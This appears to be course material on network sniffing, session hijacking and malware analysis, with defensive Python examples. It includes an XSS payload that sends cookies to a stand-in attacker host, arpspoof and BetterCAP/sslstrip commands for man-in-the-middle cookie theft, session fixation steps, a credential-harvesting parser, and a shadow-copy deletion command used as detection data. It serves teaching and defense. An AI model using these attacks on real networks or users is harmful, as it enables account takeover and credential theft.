Sniffing & Session Hijacking

Introduction

Sniffing and session hijacking are critical network attacks where an attacker intercepts and manipulates network traffic to steal sensitive data or take over authenticated sessions. This guide covers techniques, tools, and defenses.


1. Network Sniffing

What is Sniffing?

- Capturing and analyzing network traffic.

- Used for passive reconnaissance (e.g., stealing passwords, cookies).

- Works on unencrypted (HTTP, FTP, Telnet) and weakly encrypted protocols.


Types of Sniffing

1. Passive Sniffing 

   - Works on hubs (broadcast traffic).  

   - Attacker silently captures packets.  


2. Active Sniffing  

   - Needed on switched networks: a switch forwards each frame only to the port that owns the destination MAC, so the attacker's port sees nothing until traffic is redirected to it.  

   - Techniques: ARP Poisoning (claim the gateway's IP with the attacker's MAC), MAC Flooding (overflow the switch's CAM table so it falls back to flooding every port), DNS Spoofing (answer lookups with the attacker's IP).  


Sniffing Tools

| Tool      | Purpose                                  |
|-----------|------------------------------------------|
| Wireshark | GUI-based packet analyzer                |
| Tcpdump   | Command-line packet capture              |
| Ettercap  | MITM (Man-in-the-Middle) attacks         |
| BetterCAP | Advanced MITM framework                  |
| dsniff    | Password sniffing (also ships arpspoof)  |


How to Perform Sniffing?

Step 1: Set Up Promiscuous Mode

Promiscuous mode makes the NIC hand frames addressed to other MACs up to the sniffer. Wireshark and tcpdump request it themselves when a capture starts, so the manual step only matters for tools that do not, and it needs root. On current Linux the `ip` command (`ip link set eth0 promisc on`) replaces the legacy `ifconfig` form; `ip link show eth0` lists PROMISC among the flags once it is on:

```bash
ifconfig eth0 promisc  # Enable promiscuous mode (legacy net-tools syntax)
```


Step 2: Capture Traffic with Wireshark

- Open Wireshark → Select interface → Start capture.

- Apply display filters (e.g., `http`, `ftp`, `tcp.port == 80`).


Step 3: Analyze Packets

- Look for plaintext passwords (HTTP, FTP).

- Extract cookies (`Cookie:` header in HTTP).


2. Session Hijacking

What is Session Hijacking?

- Stealing a valid session token (cookie, session ID) to impersonate a user.

- Common targets: web apps (cookie / session ID theft) and unencrypted TCP sessions such as Telnet (TCP hijacking). Encrypted transports such as SSH and RDP resist on-the-wire hijacking; attacks there need the client to accept an attacker's host key or certificate, or a compromised endpoint.


Types of Session Hijacking

| Type                       | Method                                                |
|----------------------------|-------------------------------------------------------|
| Predictable Session Tokens | Guessing weak or sequential session IDs               |
| Session Sidejacking        | Sniffing cookies sent over unencrypted HTTP           |
| Session Fixation           | Forcing a victim to use an attacker-chosen session ID |
| Cross-Site Scripting (XSS) | Stealing cookies via injected JavaScript              |
| Man-in-the-Middle (MITM)   | Intercepting and modifying traffic in transit         |


Session Hijacking Tools

| Tool        | Purpose                                         |
|-------------|-------------------------------------------------|
| Burp Suite  | Intercepting & modifying HTTP sessions          |
| ZAP (OWASP) | Intercepting proxy for web app session testing  |
| Ferret      | Cookie capture (sidejacking)                    |
| Hamster     | Sidejacking proxy that replays Ferret's cookies |
| Ettercap    | MITM-based session hijacking                    |


How to Perform Session Hijacking?

Method 1: Cookie Theft via XSS

1. Inject a script into a page the victim will load. This only works when the session cookie lacks the HttpOnly flag, because `document.cookie` cannot read HttpOnly cookies:

```javascript
// attacker.com stands for the attacker-controlled host
document.location='http://attacker.com/steal.php?cookie='+document.cookie;
```

2. Capture the stolen cookie on the attacker's server (`steal.php` logs the `cookie` query parameter). The redirect is visible to the victim; quieter payloads request the same URL as an image instead of navigating to it.


Method 2: ARP Spoofing + Cookie Sniffing

1. ARP Poisoning (make the victim 192.168.1.100 send its gateway-bound traffic to the attacker). Enable IP forwarding on the attacker first (`sysctl -w net.ipv4.ip_forward=1`), otherwise the victim's packets die at the attacker's host and the outage gives the attack away; add `-r` to poison both the victim and the gateway so replies are captured too:

```bash
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1   # tell 192.168.1.100 that 192.168.1.1 is at the attacker's MAC
```

2. Use Wireshark or Ettercap on the attacker to pull `Cookie:` headers out of the victim's HTTP requests.

3. Load the stolen cookie into the attacker's browser (Chrome DevTools → Application → Cookies → edit the value) and reload the site as the victim.


Method 3: Session Fixation

1. Pick a session ID the attacker knows (e.g., PHPSESSID=attacker123). The attack needs a server that accepts IDs it never issued (PHP does so unless session.use_strict_mode is on).

2. Plant it on the victim: a phishing link that carries the ID in the URL (when the app reads session IDs from the query string), or a Set-Cookie pushed from an attacker-controlled subdomain.

3. When the victim logs in, the app keeps the same ID instead of issuing a new one, so the copy the attacker already holds is now authenticated.


3. Defenses Against Sniffing & Hijacking

Preventing Sniffing

✔ Encrypt traffic (HTTPS, SSH, VPN).  

✔ Disable unused protocols (Telnet, FTP).  

✔ Use ARP spoofing detection (ARPWatch, XArp) and, on managed switches, Dynamic ARP Inspection plus port security (which also limits MAC flooding).  

✔ Network segmentation (VLANs, firewalls).  
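Method 2's ARP poisoning and the ARPWatch-style detection recommended above, both in code. This is an added example, not from the course page: it builds the same "the gateway is at the attacker's MAC" reply that `arpspoof -t 192.168.1.100 192.168.1.1` sends and feeds it to a detector that keeps an IP-to-MAC table. The addresses and MACs are constructed; sending a frame for real needs a raw AF_PACKET socket as root, which this file deliberately does not open.

```python
"""ARP poisoning on the wire, and the check that catches it.

Added example, not course code. Addresses and MACs are constructed:
192.168.1.1 is the gateway, 192.168.1.100 the victim, aa:bb:cc:dd:ee:ff
the attacker's NIC. No packets are sent; frames are built and parsed only.
"""
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(mac: str) -> bytes:
    return bytes(int(octet, 16) for octet in mac.split(":"))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def ip_bytes(ip: str) -> bytes:
    return bytes(int(octet) for octet in ip.split("."))


def ip_str(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def build_arp_reply(sender_ip: str, sender_mac: str, target_ip: str, target_mac: str) -> bytes:
    """Ethernet II frame carrying an ARP reply that says "sender_ip is at sender_mac".

    Poisoning = sender_ip is the gateway's address but sender_mac is the
    attacker's; the target updates its ARP cache with the lie and starts
    sending gateway-bound packets to the attacker.
    """
    ethernet = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)  # htype Ethernet, ptype IPv4, hlen, plen, oper
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)        # sender hardware / protocol address
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)        # target hardware / protocol address
    return ethernet + arp


def parse_arp(frame: bytes):
    """Return (opcode, sender_ip, sender_mac) for an ARP frame, else None."""
    if len(frame) < 42 or struct.unpack_from("!H", frame, 12)[0] != ETH_P_ARP:
        return None
    opcode = struct.unpack_from("!H", frame, 20)[0]
    return opcode, ip_str(frame[28:32]), mac_str(frame[22:28])


class ArpWatch:
    """Learns IP -> MAC bindings and alerts when a known IP shows up with a
    different MAC, which is what ARPWatch and XArp do. The first binding is
    kept, so every further spoofed reply keeps alerting instead of overwriting it."""

    def __init__(self):
        self.table = {}
        self.alerts = []

    def observe(self, frame: bytes) -> None:
        parsed = parse_arp(frame)
        if parsed is None:
            return
        opcode, ip, mac = parsed
        known = self.table.get(ip)
        if known is None:
            self.table[ip] = mac
        elif known != mac:
            kind = "reply" if opcode == ARP_REPLY else "request"
            self.alerts.append(f"{ip} moved from {known} to {mac} (ARP {kind})")


def demo() -> list:
    """Legitimate gateway reply first, then the attacker's poisoned one."""
    gateway, victim, attacker = "00:11:22:33:44:55", "66:77:88:99:aa:bb", "aa:bb:cc:dd:ee:ff"
    watch = ArpWatch()
    watch.observe(build_arp_reply("192.168.1.1", gateway, "192.168.1.100", victim))
    watch.observe(build_arp_reply("192.168.1.1", attacker, "192.168.1.100", victim))
    return watch.alerts


if __name__ == "__main__":
    for alert in demo():
        print(alert)
```

The detector keeps the first binding on purpose: a real gateway MAC change is rare and operator-driven, so an alert on every conflicting frame is the right default, and unsolicited replies for an IP nobody asked about are themselves a signal worth logging.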


Preventing Session Hijacking

✔ Use HTTPS (TLS) for all web traffic and set HSTS so browsers refuse the downgrade that sslstrip relies on.  

✔ Secure cookies (HttpOnly, Secure, SameSite flags).  

✔ Regenerate session IDs after login, and reject IDs the server never issued.  

✔ Implement CSRF tokens (they do not stop token theft, but they keep an attacker from driving the victim's own session cross-site).  

✔ Monitor abnormal logins (IP changes, multiple concurrent sessions).  
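Session fixation (Method 3 above) and the two defenses that break it, regenerating the ID at login and refusing IDs the server never issued, shown side by side along with a Set-Cookie builder that sets the flags listed above. This is an added example, not course code: the in-memory apps, the user `alice` and her password are constructed so the attack can be replayed offline without a web framework.

```python
"""Session fixation: a vulnerable session handler next to a hardened one,
plus a Set-Cookie builder with the defensive flags.

Added example, not from the course page. USERS, the two tiny apps and the
planted id 'attacker123' are constructed for the demonstration.
"""
import hmac
import secrets
from http.cookies import SimpleCookie

USERS = {"alice": "correct horse battery staple"}  # constructed credential store


def check_password(user: str, password: str) -> bool:
    stored = USERS.get(user)
    return stored is not None and hmac.compare_digest(stored.encode(), password.encode())


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie value carrying Secure, HttpOnly and SameSite."""
    c = SimpleCookie()
    c["PHPSESSID"] = session_id
    c["PHPSESSID"]["path"] = "/"
    c["PHPSESSID"]["secure"] = True     # only sent over HTTPS: defeats sidejacking
    c["PHPSESSID"]["httponly"] = True   # invisible to document.cookie: defeats XSS theft
    c["PHPSESSID"]["samesite"] = "Lax"  # not attached to cross-site POSTs
    return c.output(header="").strip()


class VulnerableApp:
    """Honours a session id supplied in the URL and keeps it across login:
    the two conditions that make fixation work."""

    def __init__(self):
        self.sessions = {}  # session id -> {"user": name or None}

    def visit(self, url_sid=None, cookie_sid=None):
        sid = url_sid or cookie_sid or secrets.token_urlsafe(32)
        self.sessions.setdefault(sid, {"user": None})  # adopts attacker-chosen ids
        return sid

    def login(self, sid, user, password):
        if sid not in self.sessions or not check_password(user, password):
            return None
        self.sessions[sid]["user"] = user  # same id before and after authentication
        return sid

    def whoami(self, sid):
        return self.sessions.get(sid, {}).get("user")


class HardenedApp(VulnerableApp):
    """Ignores URL session ids, only accepts ids it issued itself, and rotates
    the id at login (PHP: session.use_strict_mode=1 + session_regenerate_id(true))."""

    def visit(self, url_sid=None, cookie_sid=None):
        if cookie_sid in self.sessions:
            return cookie_sid
        sid = secrets.token_urlsafe(32)  # unknown or absent id: mint a fresh one
        self.sessions[sid] = {"user": None}
        return sid

    def login(self, sid, user, password):
        if sid not in self.sessions or not check_password(user, password):
            return None
        self.sessions.pop(sid)               # the pre-auth session is destroyed...
        new_sid = secrets.token_urlsafe(32)  # ...and a new id is bound to the user
        self.sessions[new_sid] = {"user": user}
        return new_sid


def fixation_attack(app_cls):
    """Attacker plants PHPSESSID=attacker123 via a crafted link, the victim
    logs in, the attacker then presents the same id. Returns the account the
    attacker ends up logged in as (None means the attack failed)."""
    app = app_cls()
    planted = "attacker123"
    victim_sid = app.visit(url_sid=planted)          # victim follows the phishing link
    app.login(victim_sid, "alice", USERS["alice"])   # victim authenticates normally
    return app.whoami(planted)                       # attacker replays the planted id


if __name__ == "__main__":
    print("vulnerable:", fixation_attack(VulnerableApp))   # alice
    print("hardened:  ", fixation_attack(HardenedApp))     # None
    print(session_cookie_header(secrets.token_urlsafe(32)))
```

Rotation alone is not enough: if the hardened app still adopted unknown IDs, an attacker could plant one, wait for the login, and be left holding a dead ID, but a second planted ID placed after login would be adopted as an anonymous session and not as the victim's, so both fixes belong together.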


4. Hands-On Lab

Lab: Stealing Cookies with BetterCAP

1. Install BetterCAP (packaged on Kali; other distributions may need the upstream release from https://www.bettercap.org):

```bash
sudo apt install bettercap
```

2. Start ARP spoofing. By default `arp.spoof` poisons every host `net.recon` has found; in a lab, set `arp.spoof.targets` to the victim's IP first so only that host is redirected:

```bash
sudo bettercap -iface eth0
> net.probe on
> net.recon on
> arp.spoof on
```

3. Sniff HTTP traffic. `http.proxy.sslstrip` rewrites HTTPS links in pages served over plain HTTP so the victim keeps talking HTTP to the proxy; it does nothing for sites the browser already knows through HSTS or the preload list, which is why the defenses section recommends HSTS:

```bash
> set http.proxy.sslstrip true
> http.proxy on
```

4. Analyze stolen cookies in the BetterCAP log output:

   1. Search the log for `Cookie:` and `Set-Cookie:` headers.

   2. Extract session tokens (e.g., PHPSESSID, JSESSIONID).

   3. Check for missing security flags (Secure, HttpOnly).

   4. Test whether the token is still valid by replaying it with curl or Burp Suite.

   5. Recommend HTTPS everywhere, secure cookie flags, and HSTS to prevent further theft.

Stolen cookies enable session hijacking if unprotected.
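The cookie and credential extraction of Step 3 (Analyze Packets) and the log review in lab step 4, written as code so it can run over an entire capture instead of being done by eye. This is an added example, not part of the course material: `CAPTURE` is a constructed, reassembled HTTP stream in both directions (what Wireshark's Follow TCP Stream shows); the host `intranet.example.invalid`, the cookie values and the credentials in it are made up.

```python
"""Pull credentials and session cookies out of a captured plaintext HTTP
stream and audit Set-Cookie flags.

Added example, not from the course page. CAPTURE is a constructed
"Follow TCP Stream" transcript; every host, cookie and credential in it
is invented for the demonstration.
"""
import base64
from urllib.parse import parse_qs

CAPTURE = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: intranet.example.invalid\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 30\r\n"
    b"\r\n"
    b"username=alice&password=s3cret"
    b"HTTP/1.1 302 Found\r\n"
    b"Set-Cookie: PHPSESSID=9f2c1a; Path=/\r\n"
    b"Set-Cookie: remember=1; Path=/; Secure; HttpOnly; SameSite=Lax\r\n"
    b"Location: /home\r\n"
    b"\r\n"
    b"GET /home HTTP/1.1\r\n"
    b"Host: intranet.example.invalid\r\n"
    b"Cookie: PHPSESSID=9f2c1a; remember=1\r\n"
    b"Authorization: Basic YWxpY2U6czNjcmV0\r\n"
    b"\r\n"
)

PASSWORD_FIELDS = ("password", "passwd", "pass", "pwd")
USER_FIELDS = ("username", "user", "email", "login")


def split_messages(stream: bytes):
    """Yield (start_line, [(header, value), ...], body) per HTTP message.
    Only Content-Length bodies are handled, which covers login captures."""
    pos = 0
    while pos < len(stream):
        end = stream.find(b"\r\n\r\n", pos)
        if end < 0:
            break
        lines = stream[pos:end].decode("latin-1").split("\r\n")
        headers = []
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers.append((name.strip().lower(), value.strip()))
        length = int(dict(headers).get("content-length", "0"))
        body_start = end + 4
        yield lines[0], headers, stream[body_start:body_start + length]
        pos = body_start + length


def audit_set_cookie(value: str) -> list:
    """Report each defensive attribute missing from one Set-Cookie value."""
    name = value.split("=", 1)[0].strip()
    present = {a.strip().split("=")[0].lower() for a in value.split(";")[1:]}
    return [f"{name} missing {flag}" for flag in ("Secure", "HttpOnly", "SameSite")
            if flag.lower() not in present]


def form_credentials(body: bytes):
    """user:password from a URL-encoded login body, or None."""
    form = parse_qs(body.decode("latin-1"))
    for pw_field in PASSWORD_FIELDS:
        if pw_field in form:
            user = next((form[u][0] for u in USER_FIELDS if u in form), "?")
            return f"{user}:{form[pw_field][0]}"
    return None


def harvest(stream: bytes) -> dict:
    """Everything an attacker (or an auditor) gets from one plaintext session."""
    found = {"credentials": [], "cookies": {}, "weak_set_cookies": []}
    for start_line, headers, body in split_messages(stream):
        for name, value in headers:
            if name == "authorization" and value.lower().startswith("basic "):
                decoded = base64.b64decode(value.split(None, 1)[1]).decode("latin-1")
                found["credentials"].append(("basic", decoded))
            elif name == "cookie":
                for part in value.split(";"):
                    k, _, v = part.strip().partition("=")
                    found["cookies"][k] = v
            elif name == "set-cookie":
                found["weak_set_cookies"].extend(audit_set_cookie(value))
        if start_line.startswith("POST") and body:
            cred = form_credentials(body)
            if cred:
                found["credentials"].append(("form", cred))
    return found


if __name__ == "__main__":
    for key, val in harvest(CAPTURE).items():
        print(f"{key}: {val}")
```

Feed it real data by exporting the stream from Wireshark as raw bytes, or by reassembling it from a pcap with a library such as scapy; the parser deliberately ignores chunked bodies, which login forms almost never use.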

Conclusion

- Sniffing = Capturing unencrypted traffic.  

- Session Hijacking = Stealing active sessions.  

- Defenses = Encryption, secure cookies, monitoring.  

🔹 Next Steps: 

 Module 7: Web Application Hacking 

- Try HTTPS interception (mitmproxy with its CA installed on the client) and downgrade attacks (SSLstrip), and note where HSTS stops each.  

- Explore browser security (CSP, HSTS).  

- Practice on CTF challenges  (Hack The Box, TryHackMe).  



Malware Threats & Analysis

Introduction to Malware

Malware analysis is part of this cybersecurity course. Malware (malicious software) is any program designed to harm, exploit, or infiltrate a system without the user's consent. It includes viruses, worms, trojans, ransomware, spyware, and more.


Types of Malware

1. Viruses

- Attaches itself to clean files and spreads when executed.

- Example: ILOVEYOU, Melissa.


2. Worms

- Self-replicating malware that spreads over networks.

- Example: WannaCry, Conficker.


3. Trojans

- Disguised as legitimate software but performs malicious actions.

- Example: Zeus, Emotet.


4. Ransomware

- Encrypts files and demands payment for decryption.

- Example: REvil, LockBit.


5. Spyware

- Secretly monitors user activity (keyloggers, screen capture).

- Example: DarkComet, FinFisher.


6. Rootkits

- Gains privileged access and hides malicious processes.

- Example: Stuxnet, TDL4.


7. Adware

- Displays unwanted ads and collects user data.

- Example: Fireball, Superfish.


8. Botnets

- Infected devices controlled remotely (DDoS, spam).

- Example: Mirai, Zeus.


Malware Analysis Techniques

1. Static Analysis

- Examines malware without executing it.

- Tools: PEiD, Exeinfo PE, Strings, IDA Pro, Ghidra.

- Techniques:

  - File hashing (MD5, SHA-1, SHA-256).

  - Header analysis (PE, ELF, Mach-O).

  - Strings extraction.

  - Disassembly & decompilation.


2. Dynamic Analysis

- Executes malware in a controlled environment.

- Tools: Cuckoo Sandbox, Process Monitor, Wireshark, FakeNet.

- Techniques:

  - API call monitoring.

  - Registry & file system changes.

  - Network traffic analysis.

  - Behavioral analysis.


3. Hybrid Analysis

- Combines static and dynamic techniques.

- Tools: Hybrid Analysis, VirusTotal, Joe Sandbox.


Malware Analysis Lab Setup

1. Isolated Environment

- Use virtual machines (VMware, VirtualBox) and take a clean snapshot so the VM can be reverted after every detonation.

- Disable shared folders & clipboard.

- Use Windows 10/11 (for malware targeting Windows).


2. Analysis Tools

Static Analysis:

  - PE Explorer (PE header analysis).  

  - Ghidra (reverse engineering).  

  - Detect It Easy (DIE) (packer detection).  


Dynamic Analysis:

  - Process Hacker (monitor processes).  

  - ProcMon (registry/file monitoring).  

  - Wireshark (network traffic).  

  - FakeNet-NG (simulate network).  


Sandboxing:  

  - Cuckoo Sandbox (automated analysis).  

  - Any.Run (interactive sandbox).  


3. Malware Samples

Legitimate Sources:  

  - MalwareBazaar (https://bazaar.abuse.ch)  

  - VirusShare (https://virusshare.com)  

  - theZoo (GitHub repo of live samples, https://github.com/ytisf/theZoo).  

⚠️ Warning: Never run malware on a host machine. Always use a disposable VM with no internet access.

Step-by-Step Malware Analysis

1. Initial Assessment

- Check file type (`file`, `Exeinfo PE`).

- Calculate hashes (`md5sum`, `sha256sum`).

- Scan with VirusTotal (https://www.virustotal.com).


2. Static Analysis

- Extract strings (`strings`, `FLOSS`).

- Detect packers/obfuscation (`PEiD`, `Detect It Easy`).

- Disassemble and decompile with Ghidra or IDA Pro.
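Steps 1 and 2 (initial assessment and static analysis) as one script: file type from magic bytes, hashes, a minimal PE header read, ASCII and UTF-16 strings, and per-chunk Shannon entropy as the packer indicator that Detect It Easy reports. This is an added example, not course code; `build_sample()` returns a constructed MZ/PE-shaped stub with planted strings and a deterministic high-entropy blob standing in for a packed section. It is not real malware and cannot execute.

```python
"""Static triage of a suspicious file in pure Python.

Added example, not from the course page. build_sample() is a constructed
stand-in for a suspicious binary: a DOS/COFF header stub, a few planted
strings and a sha256-chain blob that looks packed. Nothing here runs it.
"""
import hashlib
import math
import re
import struct
from collections import Counter

MAGIC = {
    b"MZ": "PE (Windows)",
    b"\x7fELF": "ELF",
    b"\xcf\xfa\xed\xfe": "Mach-O 64-bit",
    b"\xfe\xed\xfa\xce": "Mach-O 32-bit",
    b"%PDF": "PDF",
    b"\xd0\xcf\x11\xe0": "OLE2 (legacy Office)",
    b"PK\x03\x04": "ZIP (OOXML/JAR/APK)",
}
PACKER_MARKERS = (b"UPX0", b"UPX1", b".aspack", b".themida", b".vmp0")


def file_type(data: bytes) -> str:
    return next((name for magic, name in MAGIC.items() if data.startswith(magic)), "unknown")


def hashes(data: bytes) -> dict:
    return {alg: hashlib.new(alg, data).hexdigest() for alg in ("md5", "sha1", "sha256")}


def pe_header(data: bytes):
    """Machine type and section count from the COFF header, or None if not PE."""
    if not data.startswith(b"MZ") or len(data) < 64:
        return None
    e_lfanew = struct.unpack_from("<I", data, 60)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return None
    machine, n_sections = struct.unpack_from("<HH", data, e_lfanew + 4)
    return {"machine": hex(machine), "sections": n_sections}


def extract_strings(data: bytes, min_len: int = 6) -> list:
    """ASCII plus UTF-16LE strings, like `strings -a` and `strings -el`."""
    ascii_runs = re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)
    wide_runs = re.findall(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, data)
    return [s.decode("ascii") for s in ascii_runs] + [s.decode("utf-16le") for s in wide_runs]


def entropy(chunk: bytes) -> float:
    """Shannon entropy in bits per byte: near 0 for padding, near 8 for packed/encrypted data."""
    if not chunk:
        return 0.0
    n = len(chunk)
    return -sum(c / n * math.log2(c / n) for c in Counter(chunk).values())


def high_entropy_chunks(data: bytes, size: int = 512, threshold: float = 7.0) -> list:
    """Offsets of chunks that look packed or encrypted."""
    return [off for off in range(0, len(data), size) if entropy(data[off:off + size]) >= threshold]


def triage(data: bytes) -> dict:
    strings = extract_strings(data)
    return {
        "type": file_type(data),
        "size": len(data),
        **hashes(data),
        "pe": pe_header(data),
        "iocs": [s for s in strings if re.search(r"https?://|\.(exe|dll|bat|ps1)\b", s)],
        "packer_markers": [m.decode() for m in PACKER_MARKERS if m in data],
        "packed_chunks": high_entropy_chunks(data),
        "entropy": round(entropy(data), 2),
        "strings": strings,
    }


def build_sample() -> bytes:
    """Constructed stand-in for a suspicious binary (see module docstring)."""
    dos = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40)   # e_lfanew -> PE signature at 0x40
    coff = b"PE\x00\x00" + struct.pack("<HH", 0x14C, 3)    # IMAGE_FILE_MACHINE_I386, 3 sections
    planted = (b"\x00" * 20
               + b"http://c2.example.invalid/beacon\x00"
               + b"CreateRemoteThread\x00\x00"
               + "cmd.exe /c".encode("utf-16le") + b"\x00\x00"
               + b"UPX0\x00")
    blob, seed = b"", b"seed"   # sha256 chain: random-looking but repeatable
    while len(blob) < 1024:
        seed = hashlib.sha256(seed).digest()
        blob += seed
    return dos + coff + planted + blob


if __name__ == "__main__":
    report = triage(build_sample())
    for key in ("type", "size", "sha256", "pe", "iocs", "packer_markers", "packed_chunks", "entropy"):
        print(f"{key}: {report[key]}")
```

Two things the output teaches that the tool list does not: strings hidden as UTF-16 (most Windows command lines) never show up in a plain `strings` run, and the entropy of a section, not of the whole file, is what points at packing, since headers and padding drag the file-wide figure down.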


3. Dynamic Analysis

- Run in Cuckoo Sandbox.

- Monitor processes (`Process Hacker`).

- Capture network traffic (`Wireshark`).

- Check persistence mechanisms (Registry, Startup).


4. Reverse Engineering

- Use Ghidra or IDA Pro for decompilation.

- Analyze API calls (Import Address Table; imports resolved at runtime through GetProcAddress only show up under a debugger).

- Debug with x64dbg/OllyDbg.


5. Reporting

- Document findings (IOCs, behavior, C2 servers).

- Extract YARA rules for detection.


Advanced Malware Analysis

1. Analyzing Packed Malware

Unpacking Tools:  

  - `upx -d` (restores unmodified UPX-packed samples; malware authors often corrupt the UPX header so this fails and manual unpacking is needed).  

  - x64dbg (manual unpacking: run to the original entry point, then dump the process and rebuild the import table).  


2. Analyzing Shellcode

Tools:

  - scdbg (shellcode debugger).  

  - Libemu (shellcode emulator).  


3. Analyzing Document-Based Malware (PDF, Office)

Tools: 

  - oleid (Office file analysis).  

  - PDFiD (PDF analysis).  


4. Analyzing Ransomware

- Check encryption routines.

- Look for ransom note patterns.

- Analyze C2 communication.


Malware Detection & Prevention

1. Signature-Based Detection

- Matches known indicators: file hashes and byte or string patterns (YARA rules, ClamAV signatures). Fast and precise, but a one-byte change to the sample defeats a hash signature.


2. Behavioral Detection

- Monitors what code does at runtime (process injection, Run-key persistence, shadow copy deletion) rather than what it looks like (Cylance, CrowdStrike).


3. Heuristic Analysis

- Flags unknown samples from suspicious static traits (packed sections, rare imports, self-modifying code) without a specific signature; prone to false positives.


4. Endpoint Protection

- EDR (Endpoint Detection & Response) tools:  

  - CrowdStrike Falcon  

  - Microsoft Defender for Endpoint (formerly Defender ATP)  


5. Network-Based Protection

- Firewalls, IDS/IPS, SIEM (Splunk, ELK).
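Signature-based and behavioral detection (items 1 and 2 above) side by side, run over constructed endpoint telemetry of the kind ProcMon or an EDR sensor records, including the Run-key persistence that the dynamic analysis step checks for. This is an added example, not course code: the hash blocklist, the content patterns, the paths and the `EVENTS` list are all made up, and the rules are stripped-down versions of what EDR products ship.

```python
"""Signature-based versus behavioural detection over constructed events.

Added example, not from the course page. KNOWN_BAD_SHA256, CONTENT_PATTERNS
and EVENTS are invented; field names follow ProcMon/Sysmon loosely.
"""
import hashlib
import re
from collections import defaultdict

# Signature side: a hash blocklist plus byte patterns (what YARA/ClamAV match on).
KNOWN_BAD_SHA256 = {hashlib.sha256(b"constructed malicious sample").hexdigest()}
CONTENT_PATTERNS = [
    re.compile(rb"http://c2\.example\.invalid/beacon"),
    re.compile(rb"CreateRemoteThread"),
]


def signature_scan(data: bytes) -> list:
    hits = []
    if hashlib.sha256(data).hexdigest() in KNOWN_BAD_SHA256:
        hits.append("hash:known-bad")
    hits += [f"pattern:{p.pattern.decode()}" for p in CONTENT_PATTERNS if p.search(data)]
    return hits


# Behavioural side: constructed telemetry for a dropper (pid 4012) and notepad (pid 1188).
EVENTS = [
    {"pid": 4012, "type": "process_create", "image": r"C:\Users\bob\AppData\Local\Temp\invoice.pdf.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"},
    {"pid": 4012, "type": "file_write", "path": r"C:\Users\bob\AppData\Roaming\svch0st.exe"},
    {"pid": 4012, "type": "registry_set", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "value": r"C:\Users\bob\AppData\Roaming\svch0st.exe"},
    {"pid": 4012, "type": "network_connect", "dst": "203.0.113.7", "port": 4444},
    {"pid": 4012, "type": "child_create", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin delete shadows /all /quiet"},
    {"pid": 1188, "type": "process_create", "image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Windows\explorer.exe"},
    {"pid": 1188, "type": "file_write", "path": r"C:\Users\bob\Documents\notes.txt"},
]

# Each rule: (name, predicate over one event). Simplified, not vendor logic.
RULES = [
    ("mail/office client spawned a double-extension exe from Temp",
     lambda e: e["type"] == "process_create"
     and re.search(r"(?i)\\(outlook|winword|excel)\.exe$", e["parent"]) is not None
     and re.search(r"(?i)\\temp\\.*\.(pdf|docx?|xlsx?)\.exe$", e["image"]) is not None),
    ("Run-key persistence pointing into a user-writable directory",
     lambda e: e["type"] == "registry_set"
     and "\\currentversion\\run\\" in e["key"].lower()
     and "\\appdata\\" in e["value"].lower()),
    ("outbound connection to a port commonly used by C2 frameworks",
     lambda e: e["type"] == "network_connect" and e["port"] in {4444, 1337, 6667}),
    ("shadow copy deletion (ransomware precursor)",
     lambda e: e["type"] == "child_create"
     and re.search(r"(?i)vssadmin.*delete\s+shadows", e.get("cmdline", "")) is not None),
]


def behavioural_scan(events) -> dict:
    """pid -> names of the rules that fired for that process."""
    findings = defaultdict(list)
    for ev in events:
        for name, matches in RULES:
            if matches(ev) and name not in findings[ev["pid"]]:
                findings[ev["pid"]].append(name)
    return {pid: f for pid, f in findings.items() if f}


def verdicts(events, min_rules: int = 2) -> dict:
    """Require two independent behaviours before calling a process malicious:
    any single rule fires on legitimate software often enough to be noisy."""
    return {pid: ("malicious" if len(f) >= min_rules else "suspicious")
            for pid, f in behavioural_scan(events).items()}


if __name__ == "__main__":
    print(signature_scan(b"constructed malicious sample"))
    for pid, names in behavioural_scan(EVENTS).items():
        print(pid, verdicts(EVENTS)[pid], names)
```

The `signature_scan` results for the sample and for the same bytes with one character appended show the brittleness of hash signatures in one line; the pattern signatures survive that change, and the behavioural rules do not look at the file at all.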


Conclusion

- Malware analysis requires both static and dynamic techniques.

- Always analyze in a safe, isolated environment.

- Keep learning reverse engineering and behavioral analysis.

- Stay updated with new malware trends (fileless malware, AI-based attacks).


🔹 Next Steps:  

Module 6: Sniffing & Session Hijacking 

- Practice with CTF challenges (MalwareTech, Flare-On).  

- Join malware research communities (Malwarebytes, BleepingComputer).  

- Contribute to open-source malware analysis tools.